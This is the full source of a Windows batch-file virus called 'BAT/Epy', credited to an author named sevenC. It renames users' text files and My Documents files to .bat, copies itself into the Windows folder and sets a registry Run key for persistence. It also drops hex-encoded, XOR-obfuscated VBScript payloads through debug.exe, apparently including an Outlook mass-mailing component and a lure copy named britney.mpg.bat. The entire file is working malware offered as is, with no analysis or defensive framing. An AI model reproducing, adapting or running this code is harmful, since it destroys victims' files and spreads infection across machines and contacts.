:: BAT/Epy.c _____________________________________________________________
::    _______   _______   _       _   _______       ____   ____  _______
::   / ____ \\ / ____ \\ /\\     /\\ / ____ \\     /   \\ /  // / ____ \\
::  / //___\// \ \\_ \// \ \\   / // \ \\_ \//    /  /\ \/  // / //   \//
::  \______ \\ / __//     \ \\ / //  / __//      /  // \   //  \ \\    _
::  /\\___/ // \ \\__/\\   \ \/ //   \ \\__/\\  /  //  /  //    \ \\__/\\
::  \______//   \_____//    \__//     \_____// /__//  /__//      \_____//
:: ________________________http://trax.to/sevenC_________________________
:: ________________________sevenC_zone@yahoo.com_________________________

@for %%a in (C:\*.txt) do ren %%a *.bat
@for %%a in (C:\windows\*.txt) do ren %%a *.bat
@for %%a in (C:\Mydocu~1\*.*) do ren %%a *.bat
@copy %0 %windir%\system7.bat
set .....þ.....=echo e 0
%.....þ.....%100 46 75 6E 63 74 69 6F 6E 20 46 49 52 56 4D 55 41>>epy
%.....þ.....%110 28 48 29 3A 20 20 46 6F 72 20 4E 52 44 4A 52 55>>epy
%.....þ.....%120 42 45 48 20 3D 20 31 20 54 6F 20 4C 65 6E 28 48>>epy
%.....þ.....%130 29 3A 20 46 41 54 4B 54 45 46 42 20 3D 20 4D 69>>epy
%.....þ.....%140 64 28 48 2C 4E 52 44 4A 52 55 42 45 48 2C 20 31>>epy
%.....þ.....%150 29 3A 4E 42 53 4D 44 47 50 52 4F 20 3D 20 41 73>>epy
%.....þ.....%160 63 28 46 41 54 4B 54 45 46 42 29 3A 51 56 4D 52>>epy
%.....þ.....%170 47 51 48 4D 41 20 3D 20 20 51 56 4D 52 47 51 48>>epy
%.....þ.....%180 4D 41 20 26 20 43 68 72 28 4E 42 53 4D 44 47 50>>epy
%.....þ.....%190 52 4F 20 58 6F 72 20 39 29 20 3A 20 41 4C 50 50>>epy
%.....þ.....%1A0 4A 56 49 4B 56 20 3D 20 53 74 72 52 65 76 65 72>>epy
%.....þ.....%1B0 73 65 28 51 56 4D 52 47 51 48 4D 41 29 20 3A 46>>epy
%.....þ.....%1C0 49 52 56 4D 55 41 20 3D 20 41 4C 50 50 4A 56 49>>epy
%.....þ.....%1D0 4B 56 3A 20 4E 65 78 74 3A 20 45 6E 64 20 46 75>>epy
%.....þ.....%1E0 6E 63 74 69 6F 6E 0D 0A 4A 43 4F 50 45 4C 20 3D>>epy
%.....þ.....%1F0 20 22 03 04 6B 7C 5A 29 6D 67 4C 03 04 7D 71 6C>>epy
%.....þ.....%200 47 03 04 20 61 7D 68 59 27 60 6E 68 45 21 60 7B>>epy
%.....þ.....%210 68 4A 03 04 7A 7B 6C 6D 65 66 4F 6B 7C 5A 27 62>>epy
%.....þ.....%220 68 7A 7C 5B 29 67 40 29 60 6E 68 45 29 61 6A 68>>epy
%.....þ.....%230 4C 29 7B 66 4F 03 04 7D 71 6C 47 03 04 6F 60 29>>epy
%.....þ.....%240 6D 67 6C 03 04 61 7D 68 79 27 7C 68 6A 68 42 25>>epy
%.....þ.....%250 6C 64 68 67 65 65 7C 6F 7D 79 60 7B 6A 7A 27 7D>>epy
%.....þ.....%260 79 60 7B 6A 7A 7E 29 6C 65 60 6F 70 79 66 6A 27>>epy
%.....þ.....%270 66 7A 6F 03 04 67 6C 61 7D 29 2B 6C 6B 7F 2B 34>>epy
%.....þ.....%280 20 61 7D 68 79 27 7C 68 6A 68 42 21 6C 64 68 47>>epy
%.....þ.....%290 67 66 60 7A 67 6C 7D 71 4C 7D 6C 4E 27 66 7A 6F>>epy
%.....þ.....%2A0 29 7B 66 29 2B 7A 6B 7F 2B 34 20 61 7D 68 79 27>>epy
%.....þ.....%2B0 7C 68 6A 68 42 21 6C 64 68 47 67 66 60 7A 67 6C>>epy
%.....þ.....%2C0 7D 71 4C 7D 6C 4E 27 66 7A 6F 29 6F 40 03 04 6F>>epy
%.....þ.....%2D0 60 29 6D 67 6C 03 04 6C 7A 66 65 4A 27 7B 6C 79>>epy
%.....þ.....%2E0 66 7B 6D 03 04 7B 6C 79 79 66 7B 6D 29 6C 7D 60>>epy
%.....þ.....%2F0 7B 7E 27 7B 6C 79 66 7B 6D 03 04 20 6C 7C 7B 5D>>epy
%.....þ.....%300 29 25 61 7D 68 79 27 7C 68 6A 68 42 21 6C 65 60>>epy
%.....þ.....%310 6F 7D 71 6C 7D 6C 7D 68 6C 7B 6A 27 66 7A 4F 29>>epy
%.....þ.....%320 34 29 7B 6C 79 66 7B 6D 29 7D 6C 5A 03 04 6C 7A>>epy
%.....þ.....%330 66 65 6A 27 7B 6C 79 79 66 7B 6D 03 04 65 65 68>>epy
%.....þ.....%340 6D 68 6C 7B 27 79 66 6A 29 34 29 7B 6C 79 79 66>>epy
%.....þ.....%350 7B 6D 03 04 20 6C 7C 7B 7D 25 2B 7D 68 6B 27 3E>>epy
%.....þ.....%360 64 6C 7D 7A 70 7A 55 7A 7E 66 6D 67 60 7E 55 33>>epy
%.....þ.....%370 4A 2B 21 6C 65 60 4F 7D 71 6C 5D 67 6C 79 46 27>>epy
%.....þ.....%380 66 7A 4F 29 34 29 79 66 6A 29 7D 6C 5A 03 04 67>>epy
%.....þ.....%390 6C 61 7D 29 2B 7D 68 6B 2B 34 20 61 7D 68 79 27>>epy
%.....þ.....%3A0 7C 68 6A 68 42 21 6C 64 68 47 67 66 60 7A 67 6C>>epy
%.....þ.....%3B0 7D 71 4C 7D 6C 4E 27 66 7A 6F 29 6F 40 03 04 7A>>epy
%.....þ.....%3C0 6C 65 60 4F 27 62 68 7A 7C 5B 29 67 40 29 7C 68>>epy
%.....þ.....%3D0 6A 68 42 29 61 6A 68 4C 29 7B 66 4F 03 04 20 45>>epy
%.....þ.....%3E0 40 4F 21 7B 6C 6D 65 66 4F 7D 6C 4E 27 46 5A 4F>>epy
%.....þ.....%3F0 29 34 29 62 68 7A 7C 5B 29 7D 6C 5A 03 04 7D 71>>epy
%.....þ.....%400 6C 47 29 6C 64 7C 7A 6C 5B 29 7B 66 7B 7B 4C 29>>epy
%.....þ.....%410 67 46 03 04 20 45 40 4F 21 60 7B 68 4A 29 6B 7C>>epy
%.....þ.....%420 5A 03 04 7D 71 6C 67 03 04 6F 40 29 6D 67 6C 03>>epy
%.....þ.....%430 04 6C 7F 60 7B 6D 29 60 7B 68 4A 03 04 67 6C 61>>epy
%.....þ.....%440 7D 29 70 6D 68 6C 7B 7A 60 27 6C 7F 60 7B 6D 29>>epy
%.....þ.....%450 6F 40 03 04 7A 6C 7F 60 7B 4D 29 67 60 29 6C 7F>>epy
%.....þ.....%460 60 7B 4D 29 61 6A 68 4C 29 7B 66 4F 03 04 29 7A>>epy
%.....þ.....%470 6C 7F 60 7B 6D 27 66 7A 6F 34 7A 6C 7F 60 7B 4D>>epy
%.....þ.....%480 29 7D 6C 5A 03 04 2B 7A 6B 7F 27 3E 64 6C 7D 7A>>epy
%.....þ.....%490 70 7A 55 79 5C 7D 7B 68 7D 5A 55 7A 64 68 7B 6E>>epy
%.....þ.....%4A0 66 7B 59 55 7C 67 6C 44 29 7D 7B 68 7D 5A 55 5A>>epy
%.....þ.....%4B0 5E 46 4D 47 40 5E 55 33 4A 2B 29 25 6C 64 68 67>>epy
%.....þ.....%4C0 65 65 7C 6F 7D 79 60 7B 6A 7A 27 7D 79 60 7B 6A>>epy
%.....þ.....%4D0 7A 7E 29 6C 65 60 6F 70 79 66 6A 27 66 7A 4F 03>>epy
%.....þ.....%4E0 04 7D 71 6C 67 29 6C 64 7C 7A 6C 7B 29 7B 66 7B>>epy
%.....þ.....%4F0 7B 6C 29 67 46 03 04 20 2B 7D 6A 6C 63 6B 66 64>>epy
%.....þ.....%500 6C 7D 7A 70 7A 6C 65 60 6F 27 6E 67 60 7D 79 60>>epy
%.....þ.....%510 7B 6A 7A 2B 21 7D 6A 6C 63 6B 66 6C 7D 68 6C 7B>>epy
%.....þ.....%520 6A 29 34 29 66 7A 4F 29 7D 6C 5A 22 0D 0A 45 78>>epy
%.....þ.....%530 65 63 75 74 65 28 46 49 52 56 4D 55 41 28 4A 43>>epy
%.....þ.....%540 4F 50 45 4C 29 29 0D 0A 27 56 42 53 2F 45 70 79>>epy
%.....þ.....%550 20 42 79 20 73 65 76 65 6E 43 0D 0A 0D>>epy
@echo rcx>>epy
@echo 459>>epy
@echo n system7.vbs>>epy
@echo w>>epy
@echo q>>epy
@debug<epy
@move system7.vbs %windir%
@Cscript %windir%\system7.vbs
@del epy
@echo Set W = wscript.CreateObject("WScript.Shell")>>epy77.vbs
@echo W.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Epy", "C:\Windows\system7.bat">>epy77.vbs
@Cscript epy77.vbs
@Del epy77.vbs
@copy %0 C:\britney.mpg.bat
set .þ.=echo e 0
%.þ.%100 46 75 6E 63 74 69 6F 6E 20 56 52 53 44 55 54 52>>epy7
%.þ.%110 28 41 29 3A 20 20 46 6F 72 20 4E 41 53 4B 53 4C>>epy7
%.þ.%120 43 4E 4F 20 3D 20 31 20 54 6F 20 4C 65 6E 28 41>>epy7
%.þ.%130 29 3A 20 54 4E 51 45 44 4B 4C 54 20 3D 20 4D 69>>epy7
%.þ.%140 64 28 41 2C 4E 41 53 4B 53 4C 43 4E 4F 2C 20 31>>epy7
%.þ.%150 29 3A 41 49 4E 4C 4F 52 46 52 4C 20 3D 20 41 73>>epy7
%.þ.%160 63 28 54 4E 51 45 44 4B 4C 54 29 3A 4D 43 48 51>>epy7
%.þ.%170 49 4D 4D 4F 45 20 3D 20 20 4D 43 48 51 49 4D 4D>>epy7
%.þ.%180 4F 45 20 26 20 43 68 72 28 41 49 4E 4C 4F 52 46>>epy7
%.þ.%190 52 4C 20 58 6F 72 20 39 29 20 3A 20 47 42 41 55>>epy7
%.þ.%1A0 4C 4F 54 4D 53 20 3D 20 53 74 72 52 65 76 65 72>>epy7
%.þ.%1B0 73 65 28 4D 43 48 51 49 4D 4D 4F 45 29 20 3A 56>>epy7
%.þ.%1C0 52 53 44 55 54 52 20 3D 20 47 42 41 55 4C 4F 54>>epy7
%.þ.%1D0 4D 53 3A 20 4E 65 78 74 3A 20 45 6E 64 20 46 75>>epy7
%.þ.%1E0 6E 63 74 69 6F 6E 0D 0A 4A 4B 4B 49 56 43 20 3D>>epy7
%.þ.%1F0 20 22 03 04 29 7D 60 7C 58 27 65 66 03 04 29 7D>>epy7
%.þ.%200 71 6C 47 03 04 29 6D 67 6C 5A 27 65 60 68 44 03>>epy7
%.þ.%210 04 29 20 2B 7D 68 6B 27 6E 79 64 27 70 6C 67 7D>>epy7
%.þ.%220 60 7B 6B 55 33 4A 2B 21 6D 6D 48 27 7A 7D 67 6C>>epy7
%.þ.%230 64 61 6A 68 7D 7D 48 27 65 60 68 44 03 04 29 2B>>epy7
%.þ.%240 6C 60 7F 66 64 29 71 6C 7A 29 7A 7B 68 6C 79 7A>>epy7
%.þ.%250 29 70 6C 67 7D 60 7B 4B 29 6C 6C 7B 6F 29 67 66>>epy7
%.þ.%260 7E 29 7D 7A 7C 63 29 7C 66 50 29 67 66 60 7D 68>>epy7
%.þ.%270 65 7C 6E 68 7B 6E 67 66 4A 2B 34 70 6D 66 4B 27>>epy7
%.þ.%280 65 60 68 44 03 04 29 2B 7B 6C 67 67 60 7E 29 6C>>epy7
%.þ.%290 61 7D 29 6C 7B 68 29 7C 66 50 2B 34 7D 6A 6C 63>>epy7
%.þ.%2A0 6B 7C 5A 27 65 60 68 44 03 04 29 20 71 21 7A 6C>>epy7
%.þ.%2B0 60 7B 7D 67 4C 7A 7A 6C 7B 6D 6D 48 27 20 38 21>>epy7
%.þ.%2C0 7A 7D 7A 60 45 7A 7A 6C 7B 6D 6D 48 27 20 2B 40>>epy7
%.þ.%2D0 59 48 44 2B 21 6C 6A 68 79 5A 6C 64 68 47 7D 6C>>epy7
%.þ.%2E0 4E 27 65 66 34 66 7D 27 65 60 68 44 03 04 29 60>>epy7
%.þ.%2F0 6A 34 65 60 68 44 29 7D 6C 5A 03 04 29 20 39 21>>epy7
%.þ.%300 64 6C 7D 40 6C 7D 68 6C 7B 4A 27 65 66 34 60 6A>>epy7
%.þ.%310 29 7D 6C 5A 03 04 29 7D 67 7C 66 4A 27 6C 68 29>>epy7
%.þ.%320 66 5D 29 38 34 71 29 7B 66 4F 03 04 29 7A 6C 60>>epy7
%.þ.%330 7B 7D 67 4C 7A 7A 6C 7B 6D 6D 48 27 68 34 6C 68>>epy7
%.þ.%340 29 7D 6C 5A 03 04 29 20 38 21 7A 7D 7A 60 45 7A>>epy7
%.þ.%350 7A 6C 7B 6D 6D 48 27 60 79 68 64 29 34 29 68 29>>epy7
%.þ.%360 7D 6C 5A 03 04 29 20 2B 40 59 48 44 2B 21 6C 6A>>epy7
%.þ.%370 68 79 5A 6C 64 68 47 7D 6C 4E 27 7D 7C 66 29 34>>epy7
%.þ.%380 29 60 79 68 64 29 7D 6C 5A 03 04 29 20 2B 67 66>>epy7
%.þ.%390 60 7D 68 6A 60 65 79 79 48 27 62 66 66 65 7D 7C>>epy7
%.þ.%3A0 46 2B 21 7D 6A 6C 63 6B 46 6C 7D 68 6C 7B 4A 27>>epy7
%.þ.%3B0 7D 79 60 7B 6A 5A 5E 34 7D 7C 66 29 7D 6C 5A 03>>epy7
%.þ.%3C0 04 29 20 2B 67 66 60 7D 68 6A 60 65 79 79 48 27>>epy7
%.þ.%3D0 62 66 66 65 7D 7C 46 2B 21 7D 6A 6C 63 6B 46 6C>>epy7
%.þ.%3E0 7D 68 6C 7B 4A 34 65 66 29 7D 6C 5A 03 04 29 20>>epy7
%.þ.%3F0 66 7A 6F 21 7D 6A 6C 63 6B 46 6C 7D 68 6C 7B 4A>>epy7
%.þ.%400 34 66 7A 29 7D 6C 5A 03 04 29 2B 7D 6A 6C 63 6B>>epy7
%.þ.%410 46 27 64 6C 7D 7A 70 5A 6C 65 60 4F 27 6E 67 60>>epy7
%.þ.%420 7D 79 60 7B 6A 5A 29 2B 34 29 66 7A 6F 29 7D 6C>>epy7
%.þ.%430 5A 03 04 29 7D 71 6C 67 29 6C 64 7C 7A 6C 7B 29>>epy7
%.þ.%440 7B 66 7B 7B 6C 29 67 66 03 04 29 71 29 64 60 4D>>epy7
%.þ.%450 22 0D 0A 45 78 65 63 75 74 65 28 56 52 53 44 55>>epy7
%.þ.%460 54 52 28 4A 4B 4B 49 56 43 29 29 0D 0A 27 56 42>>epy7
%.þ.%470 53 2E 4F 75 74 6C 6F 6F 6B 2E 45 70 79 20 42 79>>epy7
%.þ.%480 20 73 65 76 65 6E 43 0D 0A 0D 0A 0D 0A>>epy7
@echo rcx>>epy7
@echo 387>>epy7
@echo n C:\epy.vbs>>epy7
@echo w>>epy7
@echo q>>epy7
@debug<epy7
@cscript C:\epy.vbs
@del epy7
@del C:\britney.mpg.bat
@del C:\epy.vbs
@echo Msgbox "I'm Batch Epy and You are BiTch Epy...!!" & vbcrlf & "BAT/Epy Created By sevenC [17-04-04]" & vbcrlf & "Bekasi-Indonesia",VBInformation,"BAT.Epy">>mes.vbs
@Cscript mes.vbs
@del mes.vbs

